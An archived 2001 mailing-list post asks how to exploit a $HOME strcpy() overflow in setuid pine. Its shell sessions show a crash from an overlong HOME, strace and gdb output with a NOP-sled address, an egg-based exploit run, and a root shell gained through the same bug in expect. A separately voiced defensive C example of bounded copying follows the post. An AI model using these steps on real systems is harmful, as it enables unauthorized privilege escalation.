Hi all,

Has anyone ever coded a pine exploit? I know it's vulnerable to a $HOME strcpy() problem. And I have seen it suid this or that on several ISPs even though it shouldn't ever be! What are the implications of this with pine itself? Can you simply run a command from within it? I don't think pine was designed to be run as suid and I'm not sure why anyone would give it such permissions.

[-(root@devastator:~/bleedingedge)> export HOME=`perl -e 'print "i" x 6969'`
[-(:1-07-11-20:20:51)-]<p0>
[-(root@devastator:/home/core/bleedingedge)> pine
[-(:1-07-11-20:21:10)-]<p0>
zsh: segmentation fault  pine
[-(root@devastator:/home/core/bleedingedge)> strace pine
[-(:1-07-11-20:21:12)-]<p0>
execve("/usr/bin/pine", ["pine"], [/* 20 vars */]) = 0
mmap(0, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0x40007000
mprotect(0x40000000, 20353, PROT_READ|PROT_WRITE|PROT_EXEC) = 0
mprotect(0x8048000, 1352085, PROT_READ|PROT_WRITE|PROT_EXEC) = 0
stat("/etc/ld.so.cache", {st_mode=S_IFREG|0644, st_size=8183, ...}) = 0
open("/etc/ld.so.cache", O_RDONLY) = 3
mmap(0, 8183, PROT_READ, MAP_SHARED, 3, 0) = 0x40008000
close(3) = 0
stat("/etc/ld.so.preload", 0xbfffe180) = -1 ENOENT (No such file or directory)
open("/lib/libtermcap.so.2", O_RDONLY) = 3
read(3, "\177ELF\1\1\1\0\0\0\0\0\0\0\0\0\3"..., 4096) = 4096
mmap(0, 12288, PROT_NONE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0x4000a000
mmap(0x4000a000, 7276, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_FIXED, 3, 0) = 0x4000a000
mmap(0x4000c000, 3496, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED, 3, 0x1000) = 0x4000c000
close(3) = 0
mprotect(0x4000a000, 7276, PROT_READ|PROT_WRITE|PROT_EXEC) = 0
open("/lib/libc.so.5", O_RDONLY) = 3
read(3, "\177ELF\1\1\1\0\0\0\0\0\0\0\0\0\3"..., 4096) = 4096
mmap(0, 831488, PROT_NONE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0x4000d000
mmap(0x4000d000, 599154, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_FIXED, 3, 0) = 0x4000d000
mmap(0x400a0000, 22664, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED, 3, 0x92000) = 0x400a0000
mmap(0x400a6000, 200812, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_ANONYMOUS, -1, 0) = 0x400a6000
close(3) = 0
mprotect(0x4000d000, 599154, PROT_READ|PROT_WRITE|PROT_EXEC) = 0
munmap(0x40008000, 8183) = 0
mprotect(0x8048000, 1352085, PROT_READ|PROT_EXEC) = 0
mprotect(0x4000a000, 7276, PROT_READ|PROT_EXEC) = 0
mprotect(0x4000d000, 599154, PROT_READ|PROT_EXEC) = 0
mprotect(0x40000000, 20353, PROT_READ|PROT_EXEC) = 0
personality(PER_LINUX) = 0
geteuid() = 0
getuid() = 0
getgid() = 0
getegid() = 11
brk(0x81abb88) = 0x81abb88
brk(0x81ac000) = 0x81ac000
getpid() = 21010
time(NULL) = 994904475
getuid() = 0
open("/etc/nsswitch.conf", O_RDONLY) = 3
brk(0x81af000) = 0x81af000
fstat(3, {st_mode=S_IFREG|0644, st_size=1215, ...}) = 0
mmap(0, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0x40008000
read(3, "#\n# /etc/nsswitch.conf\n#\n# An"..., 4096) = 1215
read(3, "", 4096) = 0
close(3) = 0
munmap(0x40008000, 4096) = 0
open("/etc/passwd", O_RDONLY) = 3
fstat(3, {st_mode=S_IFREG|0644, st_size=28709, ...}) = 0
mmap(0, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0x40008000
read(3, "root:x:0:0::/root:/bin/sh\ndaemo"..., 4096) = 4096
lseek(3, -4070, SEEK_CUR) = 26
close(3) = 0
munmap(0x40008000, 4096) = 0
brk(0x81b1000) = 0x81b1000
ioctl(0, TCGETS, {B38400 opost isig icanon echo ...}) = 0
--- SIGSEGV (Segmentation fault) ---
+++ killed by SIGSEGV +++

[-(root@devastator:~/bleedingedge/test)> ./exploit4
[-(:1-07-11-20:34:22)-]<p0>
Using address: 0xbffffcc4
[root@devastator ~/bleedingedge/test]# export HOME=$EGG
[root@devastator /home/core/bleedingedge/test]# gdb pine
GDB is free software and you are welcome to distribute copies of it
 under certain conditions; type "show copying" to see the conditions.
There is absolutely no warranty for GDB; type "show warranty" for details.
GDB 4.16 (i586-unknown-linux), Copyright 1996 Free Software Foundation, Inc...
(gdb) r
Starting program: /usr/bin/pine
zsh: path too long: .zshenv

Program received signal SIGSEGV, Segmentation fault.
0x4007a43f in strcpy ()
(gdb) bt
#0  0x4007a43f in strcpy ()
#1  0x804a590 in _start ()
#2  0x90909090 in ?? ()
Cannot access memory at address 0x90909090.
(gdb) frame 0
#0  0x4007a43f in strcpy ()
(gdb) list
pine.c:252: No such file or directory.

Also I'm not quite understanding coding overflows on x86. I can't seem to overwrite the eip, and my attempts on expect and pine both segfault. Can someone tell me what I'm missing? It's harder but easier on ppc arch. :) I mean it works so well on my iBook!

[ Buffer size: 512 Egg size: 2048 Aligment: 0]
[ Address: 0x100111f8 Offset: 0 ]
sh-2.05$ export HOME=$EGG
sh-2.05$ expect
sh-2.05# id
uid=0(root) gid=1000(core) groups=1000(core),4(adm),24(cdrom),29(audio),30(dip)
sh-2.05#

I don't feel like building pine for ppc but I'm sure it's just as simple. Thanks in advance for any x86 help.

Best Regards,
Charles Stevenson
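The bug class the post describes (an environment variable such as $HOME copied with strcpy() into a fixed-size buffer, in a binary that some sites have made setuid) is easiest to see as the unsafe copy next to a bounded replacement. The following is an added example written for this archive; it is not pine's code and not code from the poster. The 512-byte buffer size, the function names and the sample inputs are all assumptions or constructed values, chosen to mirror the post's 6969-byte HOME test case.

```c
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/* Assumed size of the fixed buffer the report implies. The real pine
   buffer size is not stated in the post; 512 is a placeholder. */
#define HOME_BUF_SIZE 512

/* The unsafe pattern from the post: an attacker-controlled environment
   value copied with no length check. Kept only for contrast; it is
   called below with a short constructed input so the demo itself is safe. */
static void load_home_unsafe(char *dst, const char *home)
{
    strcpy(dst, home); /* writes past dst once strlen(home) >= HOME_BUF_SIZE */
}

/* Hardened replacement: validate before anything touches the buffer.
   Returns 0 and fills dst on success; -1 if home is NULL, not an absolute
   path, or does not fit in dst with its terminator. dst is always
   NUL-terminated on return, so callers never see stale contents. */
static int load_home_safe(char *dst, size_t dstsz, const char *home)
{
    if (dstsz == 0)
        return -1;
    dst[0] = '\0';
    if (home == NULL || home[0] != '/')
        return -1;

    /* Bounded length scan: never read further than the buffer could hold. */
    size_t len = 0;
    while (len < dstsz && home[len] != '\0')
        len++;
    if (len == dstsz)          /* no room for the terminating NUL */
        return -1;

    memcpy(dst, home, len + 1);
    return 0;
}

/* Constructed valid input: returns 1 when the copy succeeds and the
   buffer holds exactly the input. */
static int check_valid_home(void)
{
    char dst[HOME_BUF_SIZE];
    const char *home = "/home/core";           /* constructed sample */
    if (load_home_safe(dst, sizeof dst, home) != 0)
        return 0;
    return strcmp(dst, home) == 0;
}

/* Constructed input mirroring the post: 6969 bytes, here with a leading
   '/' so that rejection is caused by length alone. Returns the rc. */
static int check_overlong_home(void)
{
    char dst[HOME_BUF_SIZE];
    char *home = malloc(6970);
    if (home == NULL)
        return -2;
    memset(home, 'i', 6969);
    home[0] = '/';
    home[6969] = '\0';
    int rc = load_home_safe(dst, sizeof dst, home);
    free(home);
    return rc;                                  /* expected -1 */
}

/* HOME unset (getenv() returned NULL): must be rejected, not dereferenced. */
static int check_missing_home(void)
{
    char dst[HOME_BUF_SIZE];
    return load_home_safe(dst, sizeof dst, NULL); /* expected -1 */
}

int main(void)
{
    char dst[HOME_BUF_SIZE];
    load_home_unsafe(dst, "/home/core");        /* harmless only because input is short */
    printf("unsafe copy (short input):   %s\n", dst);
    printf("safe copy, valid HOME:       %d\n", check_valid_home());
    printf("safe copy, 6969-byte HOME:   %d\n", check_overlong_home());
    printf("safe copy, HOME unset:       %d\n", check_missing_home());
    return 0;
}
```

The length check is the fix for the overflow itself; the separate lesson of the post is that a setuid program should not trust $HOME at all. When getuid() and geteuid() differ, the privileged code path should take the home directory from the passwd entry for the real uid rather than from the environment, which is exactly the value the strace above shows pine reading from /etc/passwd anyway.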
This archive was generated by hypermail 2b30 : Thu Jul 12 2001 - 21:46:06 PDT